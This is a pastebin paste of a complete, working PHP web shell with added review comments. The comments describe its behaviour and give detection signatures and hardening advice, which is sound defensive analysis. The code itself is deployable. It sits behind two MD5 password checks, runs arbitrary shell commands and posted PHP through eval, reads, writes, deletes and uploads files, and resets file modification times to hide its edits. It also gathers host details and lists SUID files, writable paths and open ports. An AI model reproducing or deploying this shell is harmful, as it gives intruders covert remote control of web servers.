
Untitled

By: a guest on Nov 21st, 2010  |  syntax: PHP  |  size: 9.70 KB  |  views: 122  |  expires: Never
  1. <?php
  // NOTE(review): Bootstrap of a PHP web shell. It lifts the execution time
  // limit, aliases the legacy $HTTP_*_VARS arrays onto the superglobals, strips
  // magic-quotes escaping from $_POST and $_SERVER, and then exits unless the
  // GET parameter z hashes to a hard-coded MD5 value.
  2. clearstatcache ();
  3. set_magic_quotes_runtime ( 0 );
  // Stub so the ini_set() calls below do not fatal where ini_set() is missing.
  4. if (! function_exists ( 'ini_set' )) {
  5.         function ini_set() {
  6.                 return FALSE;
  7.         }
  8. }
  9. ini_set ( 'output_buffering', 0 );
  // Try to remove the script time limit; $limit is the label printed later in
  // the status row of the page.
  10. if (@set_time_limit ( 0 ) || ini_set ( 'max_execution_time', 0 ))
  11.         $limit = 'not limited';
  12. else
  13.         $limit = get_cfg_var ( 'max_execution_time' );
  // Compatibility shim for runtimes that only populate the $HTTP_*_VARS arrays.
  14. if (isset ( $HTTP_SERVER_VARS ) && ! isset ( $_SERVER )) {
  15.         $_POST = &$HTTP_POST_VARS;
  16.         $_GET = &$HTTP_GET_VARS;
  17.         $_SERVER = &$HTTP_SERVER_VARS;
  18. }
  // Undo magic-quotes escaping so posted values reach the handlers unmodified.
  19. if (@get_magic_quotes_gpc ()) {
  20.         foreach ( $_POST as $k => $v )
  21.                 $_POST [$k] = stripslashes ( $v );
  22.         foreach ( $_SERVER as $k => $v )
  23.                 $_SERVER [$k] = stripslashes ( $v );
  24. }
  // First access gate: a request whose z parameter is absent or does not match
  // gets an empty body from die(). For detection, md5($_GET[...]) compared with
  // a 32-hex literal and followed by a bare die() is a compact static signature.
  // Because z is read from $_GET it travels in the query string, so requests
  // that get past this gate are visible in web access logs.
  25. if (! isset ( $_GET ['z'] ) || md5 ( $_GET ['z'] ) !== '95e1ebd665d6df61319c938b954f913c')
  26.         die ();
  // NOTE(review): Command-execution helper of the web shell. Passes $c to the
  // first of exec(), shell_exec(), system(), passthru() for which
  // function_exists() is true and returns the captured output; returns FALSE
  // when none of the four is available. Every call carries @, which suppresses
  // PHP warnings from the call.
  // Detection/hardening: this four-step fallback chain is a stable static
  // signature. Functions listed in php.ini disable_functions fail the
  // function_exists() test, so with all four disabled this helper returns FALSE.
  27. function execute($c) {
  28.         if (function_exists ( 'exec' )) {
  29.                 @exec ( $c, $out );
  30.                 return @implode ( "\n", $out );
  31.         } elseif (function_exists ( 'shell_exec' )) {
  32.                 $out = @shell_exec ( $c );
  33.                 return $out;
  34.         } elseif (function_exists ( 'system' )) {
                  // system() echoes the command output, so it is captured in an
                  // output buffer and returned instead of being sent directly.
  35.                 @ob_start ();
  36.                 @system ( $c, $ret );
  37.                 $out = @ob_get_contents ();
  38.                 @ob_end_clean ();
  39.                 return $out;
  40.         } elseif (function_exists ( 'passthru' )) {
                  // Same buffering approach as the system() branch.
  41.                 @ob_start ();
  42.                 @passthru ( $c, $ret );
  43.                 $out = @ob_get_contents ();
  44.                 @ob_end_clean ();
  45.                 return $out;
  46.         } else {
  47.                 return FALSE;
  48.         }
  49. }
  // NOTE(review): File-read helper. Tries file() first; when that yields
  // nothing and the cURL extension is loaded (curl_version exists), it requests
  // the same path through a file: URL and captures the body with an output
  // buffer. The result is returned through htmlspecialchars().
  // Detection: the URL scheme is assembled from two string pieces ('file:/' and
  // '/'), so a literal search for "file://" does not match this line; match on
  // curl_init() receiving a concatenated file: prefix instead.
  // NOTE(review): the cURL path presumably exists for hosts where file() is
  // restricted - confirm against the PHP build in question.
  50. function read($f) {
  51.         $str = @file ( $f );
  52.         if ($str) {
  53.                 $out = implode ( '', $str );
  54.         } elseif (function_exists ( 'curl_version' )) {
  55.                 @ob_start ();
  56.                 $h = @curl_init ( 'file:/' . '/' . $f );
  57.                 @curl_exec ( $h );
  58.                 $out = @ob_get_contents ();
  59.                 @ob_end_clean ();
  60.         } else {
  61.                 $out = 'Could not read file!';
  62.         }
  63.         return htmlspecialchars ( $out );
  64. }
  // NOTE(review): File-write helper. Overwrites $f with $c and then sets the
  // file's modification time back to the value recorded before the write
  // (filemtime() followed by touch()), so the edit does not show up as a new
  // mtime. During triage, do not rely on mtime to find files changed through
  // this routine: compare content hashes with a known-good baseline, or look at
  // the inode change time (ctime), which is still updated on POSIX filesystems.
  // Returns a status string describing the save and the mtime reset.
  65. function write($f, $c) {
          // Recorded before the file is opened for writing.
  66.         $t = filemtime ( $f );
  67.         $fp = @fopen ( $f, 'w' );
  68.         if ($fp) {
  69.                 fwrite ( $fp, $c );
  70.                 fclose ( $fp );
  71.                 $out = 'File saved.' . "\n";
                  // Restore the pre-write modification time.
  72.                 if ($t && touch ( $f, $t )) {
  73.                         $out .= 'Last modification
  74. time changed.';
  75.                 } else {
  76.                         $out .= 'Could not change last modification
  77. time!';
  78.                 }
  79.         } else {
  80.                 $out = 'Saving failed!';
  81.         }
  82.         return $out;
  83. }
  // NOTE(review): Display helper for the file listing. Formats filesize($f) as
  // bytes, Kb or Mb (two decimals) with an &nbsp; before the unit; sizes of
  // 1073741824 bytes or more are returned as the raw number.
  84. function file_size($f) {
  85.         $size = filesize ( $f );
  86.         if ($size < 1024)
  87.                 $size = $size . '&nbsp;b';
  88.         elseif ($size < 1048576)
  89.                 $size = round ( $size / 1024 * 100 ) / 100 . '&nbsp;Kb';
  90.         elseif ($size < 1073741824)
  91.                 $size = round ( $size / 1048576 * 100 ) / 100 . '&nbsp;Mb';
  92.         return $size;
  93. }
  // NOTE(review): Per-request context setup. $zzz is the POST value that the
  // second access check further down compares against a hard-coded MD5.
  94. $zzz = $_POST ['zzz'];
  // Fallback definition for runtimes that lack natcasesort().
  95. if (! function_exists ( 'natcasesort' )) {
  96.         function natcasesort($arr) {
  97.                 return sort ( $arr );
  98.         }
  99. }
  // The working directory is taken from the POST field dir; every later
  // relative path (listing, edit, remove, upload) resolves against it.
  100. if (! empty ( $_POST ['dir'] )) {
  101.         $dir = $_POST ['dir'];
  102.         if (! @chdir ( $dir ))
  103.                 $out = 'chdir() failled!';
  104. }
  105. $dir = getcwd ();
  // OS family guess: a colon as the second character of the cwd (drive letter)
  // selects 'win', anything else 'nix'.
  106. (strlen ( $dir ) > 1 && $dir [1] == ':') ? $os_type = 'win' : $os_type = 'nix';
  // Host fingerprint for the status panel: php_uname(), then posix_uname().
  107. if (! $os_name = @php_uname ()) {
  108.         if (function_exists ( 'posix_uname' )) {
  109.                 $os_name = posix_uname ();
  110.         } elseif ($os_name != getenv ( 'OS' )) {
  111.                 $os_name = '';
  112.         }
  113. }
  114.  
  // NOTE(review): Looks up the account the PHP process runs as (name, uid, gid)
  // for display in the status panel. Everything this script reads, writes or
  // executes happens with that account's privileges, so a web-server account
  // restricted to what the site needs limits the reach of the handlers below.
  115. if (function_exists ( 'posix_getpwuid' )) {
  116.         $data = posix_getpwuid ( posix_getuid () );
  117.         $user = $data ['name'] . '
  118. uid(' . $data ['uid'] . ') gid(' . $data ['gid'] . ')';
  119. } else {
  120.         $user = '';
  121. }
  122.  
  // NOTE(review): Capability check shown in the status panel. safe_mode is read
  // from the PHP configuration, and command execution is probed by running
  // 'echo ssps' through execute(): any non-empty result marks it as 'on'.
  // This probe runs on each request that passed the z check, before the zzz
  // check, so a web-server worker spawning a shell for "echo ssps" is a usable
  // process-telemetry indicator, and the literal is a static one.
  123. $safe_mode = get_cfg_var ( 'safe_mode' );
  124. $safe_mode ? $safe = 'on' : $safe = 'off';
  125. execute ( 'echo ssps' ) ? $execute = 'on' : $execute = 'off';
  126.  
  // NOTE(review): Host reconnaissance and the canned-command menu. When
  // safe_mode is off, this run calls execute() for sysctl (four variants) and,
  // if no user was resolved earlier, id on the 'nix' branch; on the other
  // branch it runs ver and echo %username%. It executes before the zzz check
  // further down, so these child processes are spawned by the web-server worker
  // on every request that passed the z check: alert on a web-server process
  // starting sysctl, id, ver or a shell.
  // $aliases maps menu labels to enumeration commands (SUID/SGID search,
  // world-writable search, listening ports; service and process lists on
  // Windows). The command strings are static indicators for content scanning.
  127. $server = getenv ( 'SERVER_SOFTWARE' );
  128. if (! $server)
  129.         $server = '---';
  130. $out = '';
  131. $tail = '';
  132. $aliases = '';
  133. if (! $safe_mode) {
  134.         if ($os_type == 'nix') {
  135.                 $os .= execute ( 'sysctl -n kern.ostype' );
  136.                 $os .= execute ( 'sysctl -n
  137. kern.osrelease' );
  138.                 $os .= execute ( 'sysctl -n kernel.ostype' );
  139.                 $os .= execute ( 'sysctl -n kernel.osrelease' );
  140.                 if (empty ( $user ))
  141.                         $user = execute ( 'id' );
  142.                 $aliases = array ('' => '', 'find suid files' => 'find /
  143. -type f -perm -04000 -ls', 'find sgid files' => 'find / -type f -perm
  144. -02000 -ls', 'find all writable files in current dir' => 'find . -type f
  145. -perm -2 -ls', 'find all writable directories in current dir' => 'find .
  146. -type d -perm -2 -ls', 'find all writable directories and files in
  147. current dir' => 'find . -perm -2 -ls', 'show opened ports' => 'netstat -an |
  148. grep -i listen' );
  149.         } else {
  150.                 $os_name .= execute ( 'ver' );
  151.                 $user .= execute ( 'echo %username%' );
  152.                 $aliases = array ('' => '', 'show runing
  153. services' => 'net start', 'show process list' => 'tasklist' );
  154.         }
  155. }
  156.  
  // NOTE(review): Static page header: inline CSS plus the opening tags of the
  // outer table and the first POST form. It is printed before the zzz check
  // below, so this markup is present in the response to any request that
  // passed the z check and can serve as a response-body signature.
  157. print <<<here
  158.         <style>
  159. table {font:9pt Tahoma;border-color:white}
  160. input,select,file {background-color:#eeeeee}
  161. textarea {background-color:#f2f2f2}
  162. </style>
  163.         <br>
  164. <center>
  165. <table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver>
  166. <tr>
  167. <td>
  168. <form method=post>
  169. <table cellpadding=1 cellspacing=0 border=1 width=650>
  170. here;
  171.  
  // NOTE(review): Second access check. The POST field zzz must hash to the
  // hard-coded MD5 below; otherwise the script prints a single text input named
  // zzz and exits. The submitted value is interpolated into the value attribute
  // without htmlspecialchars().
  // Detection: a POST body carrying a zzz field, sent to a URL that also has a
  // z query parameter, is a request-level indicator for this sample; so is a
  // response consisting of the header markup and one unlabeled text input.
  172. if (empty ( $zzz ) || md5 ( $zzz ) !== 'a841b9908eac74475729ae0be846d1b6') {
  173.         print <<<here
  174. <tr>
  175. <td align=center>
  176. <input type=text name=zzz size=16 value="{$zzz}">
  177. </td>
  178. </tr>
  179. </table>
  180. here;
  181.         die ();
  182. }
  183.  
  // NOTE(review): Request dispatcher. Exactly one action runs per request,
  // chosen by the first non-empty field in this order:
  //   cmd     -> execute() (OS command)
  //   php     -> eval() of the posted string
  //   edit    -> read() a file into the result box, with efile/dir hidden fields
  //   save    -> write() posted content to the path in efile
  //   remove  -> rmdir() or unlink()
  //   newdir  -> mkdir()
  //   newfile -> touch()
  //   alias   -> execute() of the selected menu command
  //   ufile   -> copy() an uploaded file into the current directory
  // None of the values is validated. Detection: these POST field names together
  // with zzz are request-body indicators. Hardening: a document root that the
  // web-server account cannot write to blocks the save/remove/newdir/newfile/
  // upload branches.
  184. if (! empty ( $_POST ['cmd'] )) {
  185.         $out = execute ( $_POST ['cmd'] );
  186. }
  187.  
  188. elseif (! empty ( $_POST ['php'] )) {
          // eval is a language construct, not a function, so php.ini
          // disable_functions does not block this branch.
  189.         ob_start ();
  190.         eval ( $_POST ['php'] );
  191.         $out = ob_get_contents ();
  192.         ob_end_clean ();
  193. }
  194.  
  195. elseif (! empty ( $_POST ['edit'] )) {
  196.         $file = $_POST ['edit'];
  197.         $out = read ( $file );
          // $dir and $file are placed into attribute values unescaped.
  198.         $tail = '<input type=hidden name=dir value="' . $dir . '"><input type=hidden name=efile value="' . $file . '"><br><input type=submit>';
  199. }
  200.  
  201. elseif (! empty ( $_POST ['save'] )) {
  202.         $out = write ( $_POST ['efile'], $_POST ['save'] );
  203. }
  204.  
  205. elseif (! empty ( $_POST ['remove'] )) {
  206.         $obj = $_POST ['remove'];
  207.         @is_dir ( $obj ) ? $res = @rmdir ( $obj ) : $res = @unlink ( $obj );
  208.         $res ? $out = 'Removed successfully' : $out = 'Removing failed!';
  209. }
  210.  
  211. elseif (! empty ( $_POST ['newdir'] )) {
  212.         @mkdir ( $_POST ['newdir'] ) ? $out = 'Directory created.' : $out = 'Could not create directory!';
  213. }
  214.  
  215. elseif (! empty ( $_POST ['newfile'] )) {
  216.         @touch ( $_POST ['newfile'] ) ? $out = 'File created.' : $out = 'Could not create file!';
  217. }
  218.  
  219. elseif (! empty ( $_POST ['alias'] )) {
  220.         $out = execute ( $_POST ['alias'] );
  221. }
  222.  
  223. elseif (! empty ( $_FILES ['ufile'] ['tmp_name'] )) {
          // The destination name is the client-supplied file name, appended to
          // the current directory with chr(47), i.e. '/'.
  224.         if (! is_uploaded_file ( $_FILES ['ufile'] ['tmp_name'] ) || @! copy ( $_FILES ['ufile'] ['tmp_name'], $dir . chr ( 47 ) . $_FILES ['ufile'] ['name'] ))
  225.                 $out = 'Could not upload file';
  226.         else
  227.                 $out = 'Uploaded successfully.';
  228. }
  229.  
  // NOTE(review): Renders the input rows of the control form. The cmd row is
  // printed only when safe_mode is off; the php row and the edit / remove /
  // new_dir / new_file inputs are always printed. $zzz is written back into a
  // hidden field unescaped, so the access value is re-sent in the body of every
  // form submission.
  230. if (! $safe_mode)
  231.         print <<<here
  232. <tr>
  233. <td>
  234. cmd
  235. </td>
  236. <td colspan=8 nowrap>
  237. <input type=text name=cmd size=97>
  238. <input type=hidden name=zzz value="{$zzz}">
  239. </td>
  240. </tr>
  241. here;
  242. print <<<here
  243. <tr>
  244. <td>
  245. php
  246. </td>
  247. <td colspan=8>
  248. <input type=text name=php size=97>
  249. </td>
  250. </tr>
  251. <tr>
  252. <td>
  253. actions
  254. </td>
  255. <td>
  256. edit
  257. </td>
  258. <td>
  259. <input type=text name=edit size=14>
  260. </td>
  261. <td>
  262. remove
  263. </td>
  264. <td>
  265. <input type=text name=remove size=14>
  266. </td>
  267. <td>
  268. new_dir
  269. </td>
  270. <td>
  271. <input type=text name=newdir size=14>
  272. </td>
  273. <td>
  274. new_file
  275. </td>
  276. <td>
  277. <input type=text name=newfile size=15>
  278. </td>
  279. </tr>
  280. here;
  // NOTE(review): Renders the aliases drop-down when $aliases is non-empty.
  // Each option's value is the command string itself, so the selected command
  // is sent back in the POST field alias and reaches execute() in the
  // dispatcher; the full command text is therefore visible in the request body.
  281. if ($aliases) {
  282.         print <<<here
  283. <tr>
  284. <td>
  285. aliases
  286. </td>
  287. <td colspan=8>
  288. <select name=alias>
  289. here;
  290.         foreach ( $aliases as $k => $v ) {
  291.                 print '<option value="' . $v . '">' . $k . '</option>';
  292.         }
  293.         print <<<here
  294.  
  295. </select>
  296. <input type=submit>
  297. </td>
  298. </tr>
  299. here;
  300. }
  // NOTE(review): Renders the dir field, the multipart upload form and the
  // status panel. $dir, $zzz, $os_name, $user, $server, $safe, $execute and
  // $limit are interpolated without escaping. The panel labels ("OS:", "User:",
  // "Server:", "safe_mode:", "execute:", "max_execution_time:") appear verbatim
  // in the response and are usable as a response-body signature.
  301. print <<<here
  302. <tr>
  303. <td>
  304. dir
  305. </td>
  306. <td colspan=8>
  307. <input type=text value="{$dir}" name=dir size=97>
  308. </td>
  309. </tr>
  310. </form>
  311.  
  312. <form method=post enctype=multipart/form-data>
  313. <tr>
  314. <td>
  315. upload
  316. </td>
  317. <td colspan=8>
  318. <input type=file name=ufile size=60>&nbsp;&nbsp;<input type=submit value="Upload">
  319. <input type=hidden name=dir value="{$dir}">
  320. <input type=hidden name=zzz value="{$zzz}">
  321. </td>
  322. </tr>
  323. </form>
  324. </table>
  325.  
  326. <table cellpadding=0 cellspacing=0 border=1 width=650>
  327. <form method=post>
  328. <tr valign=top>
  329. <td width=70% bgcolor=#dddddd>
  330. <b>OS:</b> {$os_name}<br>
  331. <b>User:</b> {$user}<br>
  332. <b>Server:</b> {$server}<br>
  333. <b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit}
  334. <input type=hidden name=zzz value="{$zzz}">
  335. </td>
  336. <td rowspan=2 bgcolor=#dddddd>
  337. here;
  338.  
  // NOTE(review): Enumerates the current directory. Entries for which is_dir()
  // is true go to $theDirs, entries for which is_file() is true go to
  // $theFiles; anything else is dropped. Names are relative, so the tests
  // resolve against the working directory set earlier from the dir field.
  339. if ($dp = @openDir ( $dir )) {
  340.         $cObj = readDir ( $dp );
  341.         while ( $cObj ) {
  342.                 if (@is_dir ( $cObj ))
  343.                         $theDirs [] = $cObj;
  344.                 elseif (@is_file ( $cObj ))
  345.                         $theFiles [] = $cObj;
  346.                 $cObj = readDir ( $dp );
  347.         }
  348.         closedir ( $dp );
  349. }
  350.  
  // NOTE(review): Prints the directory and file listing, colour-coded by
  // access: red = writable, blue = readable, black = neither.
  // On the 'nix' branch directories are tested with is_writeable() and
  // is_readable(). On the other branch writability is tested by creating and
  // deleting a file named .ssps_tmp inside each directory; file-system auditing
  // that records create/delete events for that name under the web root will
  // catch each listing. Files are tested by opening them in append mode and
  // then read mode. Entry names are echoed without escaping.
  // When no directory entries were collected, the open_basedir setting is
  // printed instead.
  351. if (! empty ( $theDirs )) {
  352.         natcasesort ( $theDirs );
  353.         if ($os_type == 'nix') {
  354.                 foreach ( $theDirs as $cDir ) {
  355.                         $color = 'black';
  356.                         if (is_writeable ( $cDir )) {
  357.                                 $color = 'red';
  358.                         } elseif (is_readable ( $cDir )) {
  359.                                 $color = 'blue';
  360.                         }
  361.                         print "<font color=" . $color . ">&lt;" . $cDir . "&gt;</font><br>";
  362.                 }
  363.         } else {
  364.                 foreach ( $theDirs as $cDir ) {
                          // Write probe: create the marker file, then remove it.
  365.                         $tmp = $cDir . '/.ssps_tmp';
  366.                         if (@touch ( $tmp )) {
  367.                                 $color = 'red';
  368.                                 unlink ( $tmp );
  369.                         } elseif (opendir ( $cDir )) {
  370.                                 closedir ();
  371.                                 $color = 'blue';
  372.                         } else {
  373.                                 $color = 'black';
  374.                         }
  375.                         print "<font color=" . $color . ">&lt;" . $cDir . "&gt;</font><br>";
  376.                 }
  377.         }
  378. } else
  379.         print '<br>open_basedir restriction in effect. Allowed path is ' . get_cfg_var ( 'open_basedir' );
  380.  
  381. print '<br>';
  382.  
  383. if (! empty ( $theFiles )) {
  384.         natcasesort ( $theFiles );
  385.         print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">';
  386.         foreach ( $theFiles as $cFile ) {
  387.                 $size = file_size ( $cFile );
                  // Access probe by opening the file: append mode first, then read.
  388.                 if ($fp = @fopen ( $cFile, 'a' ))
  389.                         $color = 'red';
  390.                 elseif ($fp = @fopen ( $cFile, 'r' ))
  391.                         $color = 'blue';
  392.                 else
  393.                         $color = 'black';
  394.                 @fclose ( $fp );
  395.                 print '<tr><td width=100%><font color=' . $color . '>' . $cFile . '</font></td><td align=left>' . $size . '</tr>';
  396.         }
  397.         print '</table>';
  398. }
  399.  
  // NOTE(review): Closes the page and prints the result box. $out (the result
  // of the dispatched action) is placed inside a textarea named save, followed
  // by $tail and another hidden zzz field. Only the read() path escapes its
  // output; the other actions put raw output into the page.
  // The "?>" below sits inside the heredoc, so it is emitted as literal text
  // rather than ending PHP mode; a stray "?>" in the rendered page is one more
  // response-body marker for this sample.
  400. print <<<here
  401. </td>
  402. </tr>
  403. ?>
  404. <tr valign=top>
  405. <td align=center>
  406. <form method=post>
  407. results:
  408. <textarea name=save cols=55 rows=15>{$out}</textarea>
  409. {$tail}
  410. <input type=hidden name=zzz value="{$zzz}">
  411. </form>
  412. </td>
  413. </tr>
  414.  
  415. </table>
  416. </form>
  417. </td>
  418. </tr>
  419. </table>
  420. here;
  421. die ();